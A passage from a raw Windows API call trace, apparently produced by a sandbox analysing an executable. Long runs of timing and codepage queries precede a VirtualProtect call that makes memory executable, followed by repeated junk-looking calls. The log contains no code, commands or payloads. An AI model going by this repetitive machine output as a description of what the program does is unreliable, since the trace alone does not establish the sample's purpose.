out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.878] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.878] GetACP () returned 0x4e4 [0076.879] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.879] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.879] GetACP () returned 0x4e4 [0076.879] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.879] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.879] GetACP () returned 0x4e4 [0076.879] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.879] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.879] GetACP () returned 0x4e4 [0076.879] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.879] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.879] GetACP () returned 0x4e4 [0076.880] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.880] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.880] GetACP () returned 0x4e4 [0076.909] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.909] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.909] GetACP () returned 0x4e4 [0076.909] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.910] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.910] GetACP () returned 0x4e4 [0076.910] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.910] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.910] GetACP () returned 0x4e4 [0076.910] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.910] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.910] GetACP () returned 0x4e4 [0076.911] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.911] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.911] GetACP () returned 0x4e4 [0076.911] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.911] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.911] GetACP () returned 0x4e4 [0076.911] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.911] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.912] GetACP () returned 0x4e4 [0076.912] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.912] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.912] GetACP () returned 0x4e4 [0076.912] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.912] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.912] GetACP () returned 0x4e4 [0076.912] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.913] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.913] GetACP () returned 0x4e4 [0076.913] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.913] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.913] GetACP () returned 0x4e4 [0076.913] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.913] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.913] GetACP () returned 0x4e4 [0076.914] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.914] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.914] GetACP () returned 0x4e4 [0076.916] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.916] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.916] GetACP () returned 0x4e4 [0076.916] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.916] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.916] GetACP () returned 0x4e4 [0076.916] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.917] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.917] GetACP () returned 0x4e4 [0076.917] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.917] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.917] GetACP () returned 0x4e4 [0076.917] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.917] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.917] GetACP () returned 0x4e4 [0076.917] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.917] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.917] GetACP () returned 0x4e4 [0076.917] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.918] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.918] GetACP () returned 0x4e4 [0076.918] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.918] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.918] GetACP () returned 0x4e4 [0076.918] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.918] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.918] GetACP () returned 0x4e4 [0077.272] VirtualProtect (in: lpAddress=0x645ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0077.273] AddAtomA (lpString=0x0) returned 0x0 [0077.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.273] AddAtomA (lpString=0x0) returned 0x0 [0077.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.274] AddAtomA (lpString=0x0) returned 0x0 [0077.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.274] AddAtomA (lpString=0x0) returned 0x0 [0077.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.274] AddAtomA (lpString=0x0) returned 0x0 [0077.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.274] AddAtomA (lpString=0x0) returned 0x0 [0077.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.274] AddAtomA (lpString=0x0) returned 0x0 [0077.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.275] AddAtomA (lpString=0x0) returned 0x0 [0077.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.275] AddAtomA (lpString=0x0) returned 0x0 [0077.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.275] AddAtomA (lpString=0x0) returned 0x0 [0077.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.275] AddAtomA (lpString=0x0) returned 0x0 [0077.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.275] AddAtomA (lpString=0x0) returned 0x0 [0077.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.275] AddAtomA (lpString=0x0) returned 0x0 [0077.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.276] AddAtomA (lpString=0x0) returned 0x0 [0077.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.276] AddAtomA (lpString=0x0) returned 0x0 [0077.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.276] AddAtomA (lpString=0x0) returned 0x0 [0077.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.276] AddAtomA (lpString=0x0) returned 0x0 [0077.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.276] AddAtomA (lpString=0x0) returned 0x0 [0077.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.276] AddAtomA (lpString=0x0) returned 0x0 [0077.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.276] AddAtomA (lpString=0x0) returned 0x0 [0077.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.277] AddAtomA (lpString=0x0) returned 0x0 [0077.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.277] AddAtomA (lpString=0x0) returned 0x0 [0077.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.277] AddAtomA (lpString=0x0) returned 0x0 [0077.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.277] AddAtomA (lpString=0x0) returned 0x0 [0077.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.277] AddAtomA (lpString=0x0) returned 0x0 [0077.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.277] AddAtomA (lpString=0x0) returned 0x0 [0077.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.278] AddAtomA (lpString=0x0) returned 0x0 [0077.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.278] AddAtomA (lpString=0x0) returned 0x0 [0077.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.278] AddAtomA (lpString=0x0) returned 0x0 [0077.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.278] AddAtomA (lpString=0x0) returned 0x0 [0077.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.278] AddAtomA (lpString=0x0) returned 0x0 [0077.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.283] AddAtomA (lpString=0x0) returned 0x0 [0077.283] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.283] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.283] AddAtomA (lpString=0x0) returned 0x0 [0077.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.284] AddAtomA (lpString=0x0) returned 0x0 [0077.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.284] AddAtomA (lpString=0x0) returned 0x0 [0077.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.284] AddAtomA (lpString=0x0) returned 0x0 [0077.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.284] AddAtomA (lpString=0x0) returned 0x0 [0077.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.284] AddAtomA (lpString=0x0) returned 0x0 [0077.284] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.284] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.285] AddAtomA (lpString=0x0) returned 0x0 [0077.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.285] AddAtomA (lpString=0x0) returned 0x0 [0077.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.285] AddAtomA (lpString=0x0) returned 0x0 [0077.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.285] AddAtomA (lpString=0x0) returned 0x0 [0077.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.285] AddAtomA (lpString=0x0) returned 0x0 [0077.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.285] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.285] AddAtomA (lpString=0x0) returned 0x0 [0077.285] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.286] AddAtomA (lpString=0x0) returned 0x0 [0077.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.286] AddAtomA (lpString=0x0) returned 0x0 [0077.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.286] AddAtomA (lpString=0x0) returned 0x0 [0077.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.286] AddAtomA (lpString=0x0) returned 0x0 [0077.286] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.286] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.287] AddAtomA (lpString=0x0) returned 0x0 [0077.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.287] AddAtomA (lpString=0x0) returned 0x0 [0077.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.287] AddAtomA (lpString=0x0) returned 0x0 [0077.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.287] AddAtomA (lpString=0x0) returned 0x0 [0077.287] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.287] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.288] AddAtomA (lpString=0x0) returned 0x0 [0077.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.288] AddAtomA (lpString=0x0) returned 0x0 [0077.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.288] AddAtomA (lpString=0x0) returned 0x0 [0077.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.288] AddAtomA (lpString=0x0) returned 0x0 [0077.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.288] AddAtomA (lpString=0x0) returned 0x0 [0077.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.288] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.288] AddAtomA (lpString=0x0) returned 0x0 [0077.288] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.289] AddAtomA (lpString=0x0) returned 0x0 [0077.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.289] AddAtomA (lpString=0x0) returned 0x0 [0077.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.289] AddAtomA (lpString=0x0) returned 0x0 [0077.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.289] AddAtomA (lpString=0x0) returned 0x0 [0077.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.289] AddAtomA (lpString=0x0) returned 0x0 [0077.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.289] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.289] AddAtomA (lpString=0x0) returned 0x0 [0077.289] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0077.290] AddAtomA (lpString=0x0) returned 0x0 [0077.290] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0077.290] GetCurrentDirectoryA (in: nBufferLength=0x0, 